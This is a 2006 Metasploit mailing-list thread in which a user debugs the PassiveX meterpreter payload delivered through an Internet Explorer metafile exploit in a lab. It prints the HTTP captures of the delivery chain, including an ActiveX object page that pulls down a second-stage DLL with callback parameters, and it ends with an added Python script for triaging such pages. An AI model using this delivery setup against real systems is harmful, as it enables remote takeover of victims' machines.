Metasploit mailing list archives
Using the PassiveX payload
From: featuremeister at googlemail.com (Feature Meister)
Date: Fri, 5 May 2006 11:11:43 +0200
Hi, it seems as if the control does not get registered. At least there's nothing like a "PassiveX.PassiveX" or "CPassiveX" registered under HKEY_CLASSES_ROOT. The account I am trying it with has administrative privileges.

Requests:

============================================================
1st request (client -> 192.168.71.75:80):

GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.71.75
Connection: Keep-Alive

============================================================
1st response:

HTTP/1.1 200 OK
[lots of garbled X-something headers]
Content-Type: text/plain
Content-Length: 1064
Connection: close

<html><meta http-equiv='refresh' content='0; URL=http://192.168.71.75:80/oLS5EVfdp4EbzJ6E/tq0t6bYDRZpAW/VPQDnp1zZjLjxQhsbpWtWOzMYfVkt/qDEQ7gILJFcbnj4BFRE/HC4VS3s6WACBB/KIn3qj593.tiff'><body><div class='...'></div>One second please...</body></html>

============================================================
2nd request (C -> 192.168.71.75:80):

GET /oLS5EVfdp4EbzJ6E/tq0t6bYDRZpAW/VPQDnp1zZjLjxQhsbpWtWOzMYfVkt/qDEQ7gILJFcbnj4BFRE/HC4VS3s6WACBB/KIn3qj593.tiff HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.71.75
Connection: Keep-Alive

2nd response:

[lots of garbled X-something headers]
[metafile exploit]

============================================================
3rd request (C -> 192.168.71.75:8000):

GET / HTTP/1.1
Accept: */*
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.71.75:8000
Connection: Keep-Alive

3rd response:

HTTP/1.1 200 OK
Connection: close
Content-type: text/html

<html><object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838" codebase="http://192.168.71.75:8000/passivex.dll#-1,-1,-1,-1"><param name="HttpHost" value="192.168.71.75"><param name="HttpPort" value="8000"><param name="DownloadSecondStage" value="1"></object></html>

============================================================
4th request (C -> 192.168.71.75:8000):

GET /passivex.dll HTTP/1.1
Accept: application/x-cabinet-win32-x86, application/x-pe-win32-x86, application/octet-stream, application/x-setupscript, */*
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.71.75:8000
Connection: Keep-Alive

4th response:

HTTP/1.1 200 OK
Connection: close
Content-type: application/octet-stream

[here comes passivex.dll]

============================================================
On MSFConsole I see:

msf ie_xp_pfv_metafile(win32_passivex_meterpreter) > exploit
[*] Starting PassiveX Handler on 192.168.71.75:8000.
[*] Waiting for connections to http://192.168.71.75:80/
[*] HTTP Client connected from 192.168.71.71:1078, redirecting...
[*] HTTP Client connected from 192.168.71.71:1079, sending 1452 bytes of payload...
[*] Sending PassiveX main page to client...
[*] Sending PassiveX DLL in HTTP response (106496 bytes)...

I'm unsure if I should post the tcpdump (~ 60K compressed) to this list.

Marco

On 5/4/06, mmiller at hick.org <mmiller at hick.org> wrote:
On Thu, May 04, 2006 at 05:02:55PM +0200, Feature Meister wrote:

Hi all, I am desperately looking for the PassiveX payload to work. I already saw some earlier postings on this list regarding this topic and also read the theory on "uninformed". What I'm trying is the following setup:

attacker's machine (A): OS: WinXP SP2 (de), no additional patches; Metasploit Framework 2.5; Exploit: ie_xp_pfv_metafile; Payload: win32_passivex_meterpreter (also win32_passivex_*)

victim's machine (V): OS: WinXP SP2 (en-US), no additional patches

Scenario: When connecting to the HTTP port provided by Metasploit, the victim's machine downloads and executes the exploit. It works since the IE zone settings are changed as described. After that the exploit launches the hidden IE, which then downloads the PassiveX DLL. (I verified this by sniffing the connections.) But then nothing else happens. I would have expected the meterpreter console to come up, but there's no more communication between A and V. Any hints, suggestions, ideas?

The only thing I can think of that would lead to this scenario is the ActiveX control not properly registering after it is downloaded. Can you confirm that the PassiveX.PassiveX (may be CPassiveX...) class is getting registered? You can check in the registry under HKEY_CLASSES_ROOT. If it is getting registered, then it seems like perhaps the PXHTTPHOST/PORT is not getting set properly, though that seems unlikely. Can you include the data portion of the HTTP response that the Metasploit webserver sends to the client when it requests the root page? I'm mainly interested in seeing the parameters that are sent in the object.
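The exchange Marco captured is a useful pattern for incident triage: a meta-refresh redirect into an exploit file, followed by an `<object>` page that tells the browser which CLSID to load and where the control should call back. The following script is an added example, not code from the thread or from Metasploit; it parses captured HTTP response bodies (sample bodies below are constructed from the ones quoted above) and pulls out the redirect target, the CLSID (the value to look for under HKEY_CLASSES_ROOT\CLSID when checking whether the control registered), the codebase host/port, and the HttpHost/HttpPort callback parameters.

```python
"""Triage helper for ActiveX delivery pages of the kind shown in the thread."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed samples, modelled on the 1st and 3rd responses quoted above.
SAMPLE_LANDING_PAGE = (
    "<html><meta http-equiv='refresh' content='0; URL=http://192.168.71.75:80/"
    "oLS5EVfdp4EbzJ6E/KIn3qj593.tiff'><body><div class='x'></div>"
    "One second please...</body></html>"
)
SAMPLE_OBJECT_PAGE = (
    '<html><object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838" '
    'codebase="http://192.168.71.75:8000/passivex.dll#-1,-1,-1,-1">'
    '<param name="HttpHost" value="192.168.71.75">'
    '<param name="HttpPort" value="8000">'
    '<param name="DownloadSecondStage" value="1"></object></html>'
)

class ActiveXDeliveryParser(HTMLParser):
    """Collects meta-refresh targets and <object>/<param> details."""
    def __init__(self):
        super().__init__()
        self.redirects = []   # URLs from <meta http-equiv=refresh>
        self.objects = []     # one dict per <object>
        self._current = None  # <object> currently being filled with <param>s

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            # content looks like "0; URL=http://..."; keep only the URL part
            for part in a.get("content", "").split(";"):
                if part.strip().lower().startswith("url="):
                    self.redirects.append(part.strip()[4:])
        elif tag == "object":
            self._current = {"classid": a.get("classid"),
                             "codebase": a.get("codebase"), "params": {}}
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][a.get("name")] = a.get("value")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None

def analyze(body):
    """Return redirect targets and, per <object>, CLSID, codebase origin and callback."""
    p = ActiveXDeliveryParser()
    p.feed(body)
    p.close()
    findings = []
    for obj in p.objects:
        cb = urlsplit(obj["codebase"] or "")  # fragment "#-1,-1,-1,-1" is the version spec
        params = obj["params"]
        findings.append({"classid": obj["classid"], "codebase_host": cb.hostname,
                         "codebase_port": cb.port, "params": params,
                         "callback": f'{params.get("HttpHost")}:{params.get("HttpPort")}'})
    return {"redirects": p.redirects, "objects": findings}
```

Feed it the response bodies from a capture (one body per call) and compare the extracted CLSID against what is actually registered on the affected host.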